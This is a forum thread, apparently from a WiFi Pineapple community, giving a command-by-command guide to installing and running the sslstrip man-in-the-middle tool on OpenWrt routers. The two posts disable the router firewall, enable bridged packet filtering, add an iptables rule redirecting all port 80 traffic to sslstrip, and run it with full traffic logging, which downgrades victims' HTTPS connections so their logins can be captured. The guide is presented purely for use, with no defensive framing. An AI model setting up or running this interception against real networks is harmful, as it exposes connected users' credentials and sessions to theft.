Jump to content

Guide For Installing Sslstrip On Openwrt


thaihenry
 Share

Recommended Posts

This is a guide on how to get sslstrip working on openwrt.

This should work on ANY router that supports openwrt with USB ports and 32 MB of memory or more. A fast CPU would help, however sslstrip runs fine on 400 mgz CPU. I have tested this on the pineapple mark 4 and on the tplink WR703N

1. Make sure you install a firmware with a version 3.0 or greater kernel. At this time only the development snapshots (firmware) of openwrt have linux 3.3

iptables may not be properly supported on earlier versions.

2. Install USB support, this is very well documented elsewhere on this site

3. edit /etc/profile

vi /etc/profile

a. Change the existing path statement to the following:

export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/opt/bin:/opt/sbin:/opt/usr/bin:/opt/usr/sbin

b. Add this line:

export LD_LIBRARY_PATH=/lib:/usr/lib:/opt/lib:/opt/usr/lib

4. edit /etc/sysctl.conf (otherwise port redirect to port 10000 will not work!)

change the 0 to 1 in the following section:

vi /etc/sysctl.conf

# disable bridge firewalling by default

net.bridge.bridge-nf-call-arptables=1

net.bridge.bridge-nf-call-ip6tables=1

net.bridge.bridge-nf-call-iptables=1

5. Disable the firewall using the command line or web interface. (or modify iptables for proper routing)

6. Install the following packages:

opkg -dest usb install python

opkg -dest usb install zope-interface

opkg -dest usb install twisted-web

opkg -dest usb install pyopenssl

Optional but very usefull:

opkg -dest usb install nano

opkg -dest usb install screen

-dest usb may be different on your router depending on how you setup your usb disk and swap. Don't forget to add dest usb /usb in your software configuration.

7 Download sslstrip:

wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz

tar zxvf sslstrip-0.6.tar.gz

cd sslstrip-0.6

8. Fixes to get sslstrip working properly:

ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7

touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py

Optional for nano and screen:

ln -s /usb/usr/share/terminfo /usr/share/terminfo

9. to get sslstrip running:

iptables --table nat --append PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

python sslstrip.py -a -k -f -w /usb/log.txt

Once you have everything working properly, you can install sslstrip as usual (python setup.py install) so that you can use your favorite scripts on openwrt.

Edited by thaihenry
Link to comment
Share on other sites

For existing users of the Pineapple that want to get sslstrip working properly:

1. edit /etc/sysctl.conf (otherwise port redirect to port 10000 will not work!)

change the 0 to 1 in the following section:

vi /etc/sysctl.conf

# disable bridge firewalling by default

net.bridge.bridge-nf-call-arptables=1

net.bridge.bridge-nf-call-ip6tables=1

net.bridge.bridge-nf-call-iptables=1

2. Depending on what version you have make sure that the firewall is disabled.

3. Install the following packages in case they were never installed:

opkg -dest usb install python

opkg -dest usb install zope-interface

opkg -dest usb install twisted-web

opkg -dest usb install pyopenssl

If you want to get the latest version of sslstrip:

4. Download sslstrip:

wget http://www.thoughtcr...trip-0.6.tar.gz

tar zxvf sslstrip-0.6.tar.gz

cd sslstrip-0.6

5. Fixes to get sslstrip working properly:

ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7

touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py

6. If you are using the sslstrip module then you will need to install sslstrip:

python setup.py install

otherwise you can just run it from the command line:

iptables --table nat --append PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

python sslstrip.py -a -k -f -w /usb/log.txt

Edited by thaihenry
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...